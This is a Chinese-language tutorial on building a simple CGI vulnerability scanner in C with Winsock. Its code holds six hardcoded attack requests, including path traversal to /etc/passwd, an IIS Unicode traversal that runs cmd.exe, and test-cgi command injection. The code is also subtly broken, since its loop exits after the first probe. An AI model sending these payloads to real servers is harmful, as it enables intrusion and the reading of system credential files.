編寫漏洞掃描器
發(fā)表時間:2023-08-04 來源:明輝站整理相關(guān)軟件相關(guān)文章人氣:
[摘要]一、漏洞掃描器基本原理: 編寫漏洞掃描器探查遠程服務(wù)器上可能存在的具有安全隱患的文件是否存在,它的socket建立過程和上面的端口掃描器是相同的,所不同的是漏洞掃描器通常使用80端口,然后對這個端...
一、漏洞掃描器基本原理:
編寫漏洞掃描器探查遠程服務(wù)器上可能存在的具有安全隱患的文件是否存在,它的socket建立過程和上面的端口掃描器是相同的,所不同的是漏洞掃描器通常使用80端口,然后對這個端口發(fā)送一個GET文件的請求,服務(wù)器接收到請求會返回文件內(nèi)容,如果文件不存在則返回一個錯誤提示,通過接收返回內(nèi)容可以判斷文件是否存在。發(fā)送和接收數(shù)據(jù)需要使用函數(shù)send()和recv(),另外對流中存在的字符串進行判斷需要使用函數(shù)strstr(),這除了需要具備socket函數(shù)庫的知識以外,還需要一些有關(guān)string函數(shù)庫的知識。
二、簡單的漏洞掃描源代碼:
/********************************************/
/* 端口掃描器 源代碼 */
/* CgiScanner.cpp */
/********************************************/
#include <stdio.h>
#include <string.h>
#include <winsock.h>
int main(int argc,char *argv[])
{
if(argc!=2){
printf("Useage : scan [IP address]\n");
return(1);
}
struct sockaddr_in blah;
struct hostent *he;
WSADATA wsaData;
int i;
WORD wVersionRequested;
SOCKET sock;
char buff[1024];
char *ex[10];
ex[1]="GET /../../../../etc/passwd HTTP/1.0\n\n";
ex[2]="GET /scripts/..%c1%1c../winnt/system32/cmd.exe?/c+dir+c:\ HTTP/1.0\n\n";
ex[3]="GET /A.ida/%c1%00.ida HTTP/1.0\n\n";
ex[4]="GET /cgi-bin/pfdispaly.cgi?/../../../../etc/motd HTTP/1.0\n\n";
ex[5]="GET /cgi-bin/test-cgi?\help&0a/bin/cat%20/etc/passwd HTTP/1.0\n\n";
ex[6]="GET /cgi-bin/test-cgi?* HTTP/1.0\n\n";
char *fmsg="HTTP/1.1 200 OK";
wVersionRequested = MAKEWORD( 1, 1 );
if (WSAStartup(wVersionRequested , &wsaData)){
printf("Winsock Initialization failed.\n");
exit(1);
}
if ((sock=socket(AF_INET,SOCK_STREAM,0))==INVALID_SOCKET){
printf("Can not create socket.\n");
exit(1);
}
sock = socket(AF_INET,SOCK_STREAM,0);
blah.sin_family = AF_INET;
blah.sin_port = htons(80);
blah.sin_addr.s_addr= inet_addr(argv[1]);
if ((he=gethostbyname(argv[1]))!=NULL){
memcpy((char *)&blah.sin_addr.s_addr,he->h_addr,he->h_length);
}
else{
if((blah.sin_addr.s_addr=inet_addr(argv[1]))==-1){
WSACleanup();
exit(1);
}
}
for (i=1 ; i<7; i++) {
if (connect(sock,(struct sockaddr*)&blah,sizeof(blah))==0){
send(sock,ex[i],strlen(ex[i]),0);
recv(sock,buff,sizeof(buff),0);
if(strstr(buff,fmsg)!=NULL){
printf("\nFound :%s\n", ex[i]);
}
}
closesocket(sock);
WSACleanup();
return(1);
}
}
這段代碼可以檢測六個漏洞,讀者可以根據(jù)自己的需要增加漏洞掃描的數(shù)量。程序?qū)崿F(xiàn)的很簡潔,概括起來這段程序完成了一下四項工作:
1、連接目標主機SERVER;
2、向目標主機發(fā)送GET請求;
3、接收目標返回數(shù)據(jù);
4、根據(jù)返回數(shù)據(jù)判斷文件是否存在。